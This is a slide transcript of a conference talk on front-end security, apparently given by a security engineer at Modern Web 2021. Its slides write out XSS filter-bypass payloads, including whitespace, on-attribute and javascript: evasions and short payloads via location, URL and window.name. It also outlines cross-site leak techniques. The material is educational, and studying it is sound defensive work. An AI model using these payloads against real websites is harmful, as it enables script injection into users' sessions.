Upgrade to Pro — share decks privately, control downloads, hide ads and more …

接觸資安才發現前端的水真深 - Modern Web 2021

Huli
October 15, 2021
Technology
0
2.3k

接觸資安才發現前端的水真深 - Modern Web 2021

接觸資安才發現前端的水真深 - Modern Web 2021

Huli

October 15, 2021
Tweet

More Decks by Huli

See All by Huli
ModernWeb 2018 - 輕鬆應付複雜的非同步操作:RxJS + Redux Observable
aszx87410
0
170
Attacking web without JS - CSS injection
aszx87410
0
3.1k
Front-end Security that Front-end developers don't know
aszx87410
2
5.7k
你懂了 JavaScript,也不懂 JavaScript - MOPCON 2021
aszx87410
3
1k
JSDC2020 - 用 API mocking 讓前端不再苦等待
aszx87410
0
1.3k

Other Decks in Technology

See All in Technology
完璧を捨てろ! “攻め”のQAがもたらすスピードと革新/20250306 Hiroki Hachisuka
shift_evolve
0
150
AIエージェント入門
minorun365
PRO
35
20k
手を動かしてレベルアップしよう!
maruto
0
260
RaspberryPi CM4(CM5も)面白いぞ!
nonnoise
1
190
OPENLOGI Company Profile for engineer
hr01
1
20k
エンジニア主導の企画立案を可能にする組織とは?
recruitengineers
PRO
1
330
AI自体のOps 〜LLMアプリの運用、AWSサービスとOSSの使い分け〜
minorun365
PRO
9
1.2k
事業モメンタムを生み出すプロダクト開発
macchiitaka
0
110
困難を「一般解」で解く
fujiwara3
8
2.5k
LangGraph × Bedrock による複数の Agentic Workflow を利用した Supervisor 型のマルチエージェントの実現/langgraph-bedrock-supervisor-agent
ren8k
2
110
スクラムというコンフォートゾーンから抜け出そう!プロジェクト全体に目を向けるインセプションデッキ / Inception Deck for seeing the whole project
takaking22
3
220
User Story Mapping + Inclusive Team
kawaguti
PRO
3
560

Featured

See All Featured
Java REST API Framework Comparison - PWX 2021
mraible
29
8.4k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
45
9.4k
Learning to Love Humans: Emotional Interface Design
aarron
273
40k
What's in a price? How to price your products and services
michaelherold
244
12k
Producing Creativity
orderedlist
PRO
344
40k
Automating Front-end Workflow
addyosmani
1369
200k
Principles of Awesome APIs and How to Build Them.
keavy
126
17k
Building Applications with DynamoDB
mza
93
6.2k
The Art of Programming - Codeland 2020
erikaheidi
53
13k
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
193
16k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
32
2.2k
The Cult of Friendly URLs
andyhume
78
6.2k

Transcript

  1. 接觸資安才發現前端的⽔水真深 Huli @ Modern Web 2021

  2. About 上半年年:OneDegree 前端⼯工程師

  3. About 上半年年:OneDegree 前端⼯工程師 下半年年:Cymetrics 資安⼯工程師

  4. None

  5. Agenda 1. 繞過各種限制 2. side channel attack 3. 其他你不知道的功能

  6. Agenda 1. 繞過各種限制 2. side channel attack 3. 其他你不知道的功能

  7. XSS

  8. <script> alert(1) </script>

  9. <img src=x onerror=alert(1)>

  10. <svg onload=alert(1)>

  11. Q1 如果把 HTML 中的空格都拿掉 是否還可以⽤用屬性 XSS?

  12. Q1 如果把 HTML 中的空格都拿掉 是否還可以⽤用屬性 XSS?

  13. <svg onload=alert(1)>

  14. <svg/onload=alert(1)>

  15. Q2 如果禁⽌止使⽤用 on 開頭的屬性, 是否還能 XSS?

  16. Q2 如果禁⽌止使⽤用 on 開頭的屬性, 是否還能 XSS?

  17. <iframe/ src="javascript:alert(1)">

  18. Q3 如果把 javascript 開頭的值都濾掉, 是否還能 XSS?

  19. Q3 如果把 javascript 開頭的值都濾掉, 是否還能 XSS?

  20. <iframe/ src="java\tscript:alert(1)">

  21. Q4 如果去除 tab 跟空⾏行行以後去掉 javascript, 是否還能 XSS?

  22. Q4 如果去除 tab 跟空⾏行行以後去掉 javascript, 是否還能 XSS?

  23. <iframe/ src="javascript:alert(1)">

  24. <iframe/ src="&#106avascript:alert (1)">

  25. Q5 如果去除 src 屬性, 是否還能 XSS?

  26. Q5 如果去除 src 屬性, 是否還能 XSS?

  27. <a/ href="javascript:alert(1)">

  28. <script> alert(1) </script>

  29. <script> alert`1` </script>

  30. onerror=alert;throw 1

  31. onerror=eval;throw "=alert\x281\x29"

  32. onerror=eval;throw "=alert\x281\x29" Uncaught 123

  33. onerror=eval;throw "=alert\x281\x29" Uncaught=123

  34. onerror=eval;throw "=alert\x281\x29" Uncaught=alert(1)

  35. None

  36. 字數限制

  37. <svg/onload=> 13 字

  38. 利利⽤用現有資訊

  39. <svg/ onload= eval(`'`+location)> 13 + 18 = 31 字

  40. a.com#';alert(1) `'` + location => 'a.com#';alert(1)

  41. <svg/ onload= eval(`'`+document.URL)> 13 + 22 = 35 字

  42. <svg/ onload= eval(`'`+document.URL)> 13 + 22 = 35 字 9

    個字

  43. <svg/ onload= eval(`'`+URL)> 13 + 13 = 26 字

  44. None
  45. None

  46. Q6 name = 123 typeof name === "number"

  47. Q6 name = 123 typeof name === "number"

  48. example.com window.name

  49. huli.tw window.name

  50. <svg/ onload= eval(name)> 13 + 10 = 23 字

  51. https://tinyxss.terjanq.me/

  52. Agenda 1. 繞過各種限制 2. side channel attack 3. 其他你不知道的功能

  53. Agenda 1. 繞過各種限制 2. Cross site leaks (XS leak) 3.

    其他你不知道的功能

  54. Download 請輸入要搜尋的使⽤用者名稱 example.com/download

  55. Download 請輸入要搜尋的使⽤用者名稱 查無使⽤用者 example example.com/download?q=example

  56. Download 請輸入要搜尋的使⽤用者名稱 a example.com/download?q=a

  57. Download 請輸入要搜尋的使⽤用者名稱 a

  58. 然後呢,我們能做什什麼?

  59. Download 請輸入要搜尋的使⽤用者名稱 iframe example.com/download huli.tw

  60. Download 請輸入要搜尋的使⽤用者名稱 iframe example example.com/download?q=example huli.tw

  61. Download 請輸入要搜尋的使⽤用者名稱 iframe example iframe.contentWindow.origin example.com/download?q=example huli.tw

  62. Download 請輸入要搜尋的使⽤用者名稱 iframe a iframe.contentWindow.origin example.com/download?q=a huli.tw

  63. None

  64. example.com/users/123 David id=message 傳送訊息

  65. example.com/users/210 Peter id=add 加入好友

  66. 然後呢,我們能做什什麼?

  67. example.com/users/123 David id=message 傳送訊息

  68. example.com/users/123#message David id=message 傳送訊息 focus

  69. iframe example.com/users/123#message huli.tw David id=message 傳送訊息

  70. None

  71. Agenda 1. 繞過各種限制 2. side channel attack 3. 其他你不知道的功能

  72. example.com/files example.com/blog 上傳各種檔案 放各種⽂文章

  73. example.com/files example.com/blog path: /files path: /blog 上傳各種檔案 放各種⽂文章

  74. example.com/files example.com/blog path: /files path: /blog 放各種⽂文章 <script>
 alert(1)
 </script>

    files/xss.html

  75. example.com/files example.com/blog path: /files path: /blog 放各種⽂文章 <script>
 alert(1)
 </script>

    files/xss.html ?
  76. None
  77. None

  78. example.com <embed src=/pdf?token=u7Dh3 ……….

  79. example.com <embed src=/pdf?token=u7Dh3 ………. <script>
 alert(1)
 </script>

  80. example.com <embed src=/pdf?token=u7Dh3 ………. <script>
 alert(1)
 </script> ?

  81. None
  82. None

  83. Agenda 1. 繞過各種限制 2. side channel attack 3. 其他你不知道的功能

  84. 資料來來源 1.https://tinyxss.terjanq.me/ 2.https://xsleaks.dev/ 3.LINE CTF 2021 4.DiceCTF 2021 5.zer0pts CTF

    2021

  85. google: cymetrics blog